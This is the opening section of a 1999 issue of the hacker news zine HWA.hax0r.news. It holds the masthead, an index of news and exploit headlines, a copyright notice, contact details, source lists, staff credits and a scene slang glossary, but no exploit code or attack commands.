Copy Link
Add to Bookmark
Report
hwa-hn35
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 35 Volume 1 1999 Sept 25th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"We see the stars that shine so bright, the stars made for us tonight...
and all of it was made for you and me ...."
- The Passenger (Iggy Pop)
_| _| _| _| _|_|
_| _| _| _| _| _|
_|_|_|_| _| _| _| _|_|_|_|
_| _| _| _| _| _| _|
_| _| _| _| _| _|
_| _|
_|_|_| _|_|_| _| _| _| _| _| _|_|
_| _| _| _| _|_| _| _| _|_|
_| _| _| _| _| _| _| _| _|
_| _| _|_|_| _| _| _| _|
_|_|_| _|_| _| _| _| _|_|_|
_| _| _|_|_|_| _| _| _| _|_|
_| _| _| _| _| _| _| _|_|
_| _| _|_|_| _| _| _|_|_|
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
Web site sponsored by CUBESOFT networks http://www.csoft.net
check them out for great fast web hosting!
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
The Hacker's Ethic
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
A Comment on FORMATTING:
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
New mirror sites
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #35
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #35
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Datashark's rootfest challenge...................................
04.0 .. HOW-TO Beat the ADS on FWP (Free Webpage Providers)..............
05.0 .. Even More Bad News about CESA ...................................
06.0 .. NSI Opens New Email Hole ........................................
07.0 .. Security Focus Newsletter for September..........................
08.0 .. PSS Packet Storm Security comes "back" online....................
09.0 .. British Banks Suffer Blackmail Attempts .........................
10.0 .. You Have No Privacy On The Net ..................................
11.0 .. Grade Changers Sentenced ........................................
12.0 .. Another 'hacker' challenge.......................................
13.0 .. Mitnick, Encryption and the Law .................................
14.0 .. Another 'hacker' challenge.......................................
15.0 .. 9999 Caused at Least One Problem ................................
16.0 .. Japans Virus Infestations at Record Pace ........................
17.0 .. Another Word Macro Virus Found ..................................
18.0 .. Croatia: News from Sla5h.........................................
18.1 .. Lawyer: Hackers Have Rights, Too.................................
18.2 .. Cracking for the Man.............................................
18.3 .. Moscow Mayor's Site Hackski'd....................................
18.4 .. Anti Software Piracy Ads Entice Tattlers.........................
18.5 .. SERBIA THE FIRST CYBERWAR?.......................................
18.6 .. PCWEEK CHALLENGE SITE HACKED.....................................
18.7 .. "Got Root" Got rooted............................................
18.8 .. Hotmail again....................................................
19.0 .. ACTIVE X TROJAN..................................................
20.0 .. ANALYSYS BY JFS - The PCWeek hack (Details)......................
21.0 .. CALCULATOR IN THE URL............................................
22.0 .. W97M_SUPPL.......................................................
23.0 .. WHO IS TO "BLAME"................................................
24.0 .. LPAZ DEFACED.....................................................
25.0 .. VIRUS WRITING OUTLAWED...........................................
26.0 .. NETWARE 5 BUG STRIKES NSS USERS..................................
27.0 .. TAGGED STUDENTS DEFY BIG BROTHER.................................
28.0 .. HOSPITAL SECURITY ISSUES.........................................
29.0 .. HOTMAIL STILL FAR FROM SECURE....................................
30.0 .. THE GREAT FIREWALL OF CHINA......................................
31.0 .. FTC CRACKS INTERNATIONAL PORN RING...............................
32.0 .. WINLINUX2000 Windows or Linux? can't decide? try this ... .......
33.0 .. YOUR PC COULD BE TAPPED..........................................
34.0 .. HOW THE FBI BAITED THE NAUGHTON TRAP.............................
35.0 .. HAPPY BIRTHDAY TO LINUX..........................................
36.0 .. 3com SNMP bug vulnerability......................................
37.0 .. FreeBSD local DoS on network by unpriviledged user using setsockopt()
38.0 .. BSD:Three ftp daemons in ports vulnerable to attack..............
39.0 .. Two SuSE 6.2 local root exploits.................................
40.0 .. Microsoft Security Bulletin (MS99-034)...........................
41.0 .. SCO 5.0.5 lpr local root exploit.................................
42.0 .. Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an RS6000
43.0 .. SDI AMD remote exploit for RH linux..............................
44.0 .. Spoofed Id in Bluestone Sapphire/Web.............................
45.0 .. FreeBSD-SA-99:01: BSD File Flags and Programming Techniques......
46.0 .. Cisco and Nmap Dos...............................................
47.0 .. Vixie Crontab exploit code.......................................
48.0 .. Exploiting DCOM to gain Administrative rights on Windows NT 4....
49.0 .. linux tty hijacker by typo/teso..................................
50.0 .. Various Vulnerabilities in CDE...................................
51.0 .. elm filter program bug...........................................
52.0 .. Accept overflow on Netscape Enterprise Server 3.6 SP2 ...........
53.0 .. Serv-U Ver2.5 FTPd Win9x/NT Exploit..............................
54.0 .. HPSBUX9908-102 Security Vulnerability in rpc.cmsd................
55.0 .. IE 5.0 security vulnerabilities - ImportExportFavorites..........
56.0 .. libtermcap<2.0.8-15 sploit by typo@scene.at......................
57.0 .. Various buffer overflows in Windows POP3/SMTP servers............
58.0 .. NetBSD 1.4.1 local DoS...........................................
59.0 .. Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow....
60.0 .. FreeBSD NFS Exploit..............................................
61.0 .. Using Nmap for RPC vulnerability.................................
62.0 .. Clarification of the Nmap/Cisco DoS problem......................
63.0 .. 19 SCO 5.0.5+Skunware98 buffer overflows.........................
64.0 .. SDI anonymous remote exploit for proftpd.........................
65.0 .. KKIS19990914.004b: ShareDream - shared memory - ipc vulnerability
66.0 .. TenFour TFS SMTP 3.2 Buffer Overflow.............................
67.0 .. Solaris 2.7 /usr/bin/mail exploit/buffer overflow vulnerability..
68.0 .. remote DoS against inetd and ssh.................................
69.0 .. Sun Security Bulletin #00189.....................................
70.0 .. VLAN Security holes in cisco catalyst............................
71.0 .. Wingates list....................................................
72.0 .. US Army Uses BO2K ...............................................
73.0 .. India And Pakistan Duke It Out In Cyberspace ....................
74.0 .. Czech Bank Threatened by Cyber Terrorists .......................
75.0 .. 'Post Mortem' of Nasdaq Released ................................
76.0 .. DoD Creates Y2K-Alert Levels In case of Sneak Attack ............
77.0 .. Another Java Hole in Hotmail ....................................
78.0 .. Microsoft Launches New Piracy Initiative ........................
79.0 .. Online Investors at Serious Risk ................................
80.0 .. Leapfrog 1.0 Released Today (Source included)....................
81.0 .. Working for the Man .............................................
82.0 .. NAI Prepares Security Product of the Future .....................
83.0 .. Mitnick Release Date Set ........................................
84.0 .. FCC Gives Final Ruling on CALEA .................................
85.0 .. Year 2000? How About 2038? ......................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA.. .................
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
Websites;
sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
eentity ...( '' '' ): Currently active/IRC+ man in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Qubik ............................: United Kingdom
D----Y ...........................: USA/world media
HWA members ......................: World Media
Past Foreign Correspondants (currently inactive or presumed dead)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sla5h.............................: Croatia
N0Portz ..........................: Australia
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
Wyze1.............................: South Africa
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
Spikeman's site is down as of this writing, if it comes back online it will be
posted here.
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
Sla5h's email: smuddo@yahoo.com
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck, where the fuck, when the fuck etc ..
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Dicentra vexxation sAs72
Spikeman p0lix Vortexia Wyze1
Pneuma
Ken Williams/tattooman ex-of PacketStorm,
& Kevin Mitnick
kewl sites:
+ http://www.securityportal.com/ NEW
+ http://www.securityfocus.com/ NEW
+ http://www.hackcanada.com/
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
